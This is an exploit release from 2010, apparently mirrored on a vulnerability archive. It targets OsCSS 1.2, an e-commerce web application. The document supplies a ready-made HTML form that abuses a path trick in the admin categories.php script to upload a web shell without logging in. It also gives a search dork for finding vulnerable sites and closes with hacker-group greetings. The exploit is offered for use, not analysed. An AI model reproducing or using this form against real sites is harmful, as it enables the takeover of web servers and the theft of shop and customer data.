OsCSS Remote File Upload Exploit

2010-12-01T00:00:00
ID SECURITYVULNS:DOC:25212
Type securityvulns
Reporter Securityvulns
Modified 2010-12-01T00:00:00

Description

Exploit Title: OsCSS Remote File Upload Exploit

Date: 12-1-2010

Author: Shichemt Alen

Software Link: None

Version: 1.2

Platform / Tested on: Windows XP SP2 DE & Ubuntu 10.10

category: webapps/0day

Dork : inurl:"sorry script'kiddies"

Contact : shichemt@hotmail.com - http://www.shichemt-alen.com/

Exploit :

Upload Shell

<html><head><title>Shell Upload</title></head> <br><br><u>Upload Shell:</u><br> <form name="file" action="http://localhost/admin/categories.php/login.php?action=insert_category&amp;cPath=" method="post" enctype="multipart/form-data"> <input type="file" name="categories_image"><br> <input name="submit" type="submit" value=" Upload " > </form> <center> <a href="http://www.shichemt-alen.com/">Shichemt-Alen &copy; 2010</a> </center></html>

###### Made in Tunisia +216

Greets to : Geeks Team {Pr0t3ct0r,Hamed, K-D0vic, Mid0vik, UbunBoy}


xTobi, Net-Own3r, Wx, BosnianTREX, Number7, Ghost-tn and All Friends...

& All Tunisian and Muslim Hackers...

###### Made in Tunisia +216